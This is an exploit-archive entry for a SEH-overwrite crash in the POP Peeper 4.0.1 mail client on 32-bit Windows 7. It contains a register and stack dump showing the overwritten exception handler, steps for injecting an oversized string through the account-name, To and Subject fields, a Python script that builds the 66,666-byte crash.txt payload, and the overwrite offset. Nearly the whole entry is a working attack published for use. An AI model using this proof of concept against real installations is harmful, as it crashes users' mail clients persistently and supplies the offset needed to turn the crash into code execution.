POP Peeper 4.0.1 - SEH Over-Write Exploit

2015-11-10T00:00:00
ID 1337DAY-ID-24524
Type zdt
Reporter Un_N0n
Modified 2015-11-10T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            '''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
 
EIP 20203029
 
==============================
STACK:
0012FBF4   41414141
0012FBF8   41414141
0012FBFC   41414141
0012FC00   41414141
0012FC04   41414141
0012FC08   909020EB  Pointer to next SE>
0012FC0C   20203029  SE handler
0012FC10   43434343
0012FC14   43434343
0012FC18   43434343
0012FC1C   43434343
0012FC20   43434343
0012FC24   43434343
0012FC28   43434343
===============================
'''
 
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'
2- Goto Accounts->Add->CreateSingleAccount.
3- After entering the email address, the option for Account name will appear,
   enter the contents of crash.txt in it->Save.
4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt
5- Save as Draft, software will crash.
6- Open up "POPPeeper.exe" again.
7- Click on Check Mail option, Software will crash.
Everytime you click on Check mail, it will crash as it will load the saved DRAFT.
 
[Code to produce CRASH.txt]
'''
 
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
 
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''

#  0day.today [2018-03-10]  #